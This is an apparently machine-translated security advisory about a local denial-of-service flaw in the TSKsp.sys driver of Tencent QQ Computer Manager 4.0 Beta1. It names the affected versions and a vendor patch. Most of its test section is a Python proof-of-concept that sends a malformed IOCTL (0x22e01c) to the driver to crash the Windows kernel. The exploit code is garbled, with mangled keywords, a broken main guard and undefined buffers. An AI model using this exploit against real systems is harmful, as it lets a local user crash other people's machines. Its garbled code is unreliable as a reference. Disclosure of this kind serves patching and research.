Affected Versions:
Tencent QQ Computer Manager 4.0 Beta1 vulnerability description:
QQ computer manager is an upgraded version of QQ doctor 3.3. Its main functions include security protection, system optimization, and software management.
The TSKsp. sys driver installed by QQ computer manager does not correctly verify the call parameters submitted by the user. Local Users can submit malicious IOCTL requests to cause kernel crash.
<* Reference
Lufeng Li (lilf@neusoft.com)
*>
Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!
#! /Usr/bin/python
######################################## #########################
#
# Title: QQ Computer Manager TSKsp. sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Vulnerable App: vc/qqmaster/setup/QQPCMgr_Setup.exe "> http: // dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr <= v4.0Beta1
#
######################################## #########################
From ctypes import *
Kernel32 = windll. kernel32
Psapi = windll. Psapi
If _ name _ = _ main __:
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
DEVICE_NAME = "\. \ tsksp"
DwReturn = c_ulong ()
Out_data =
In_data =
Driver_handle1 = kernel32.CreateFileA (DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
Dev_ioctl = kernel32.DeviceIoControl (driver_handle1, 0x22e01c, in_data, 0, out_data, 0, byref (dwReturn), None)
Vendor patch:
Tencent
Http: // dl_dir2.qq.com/invc/qqpcmgr/setup/QQPCMgr_Setup_40_286.exe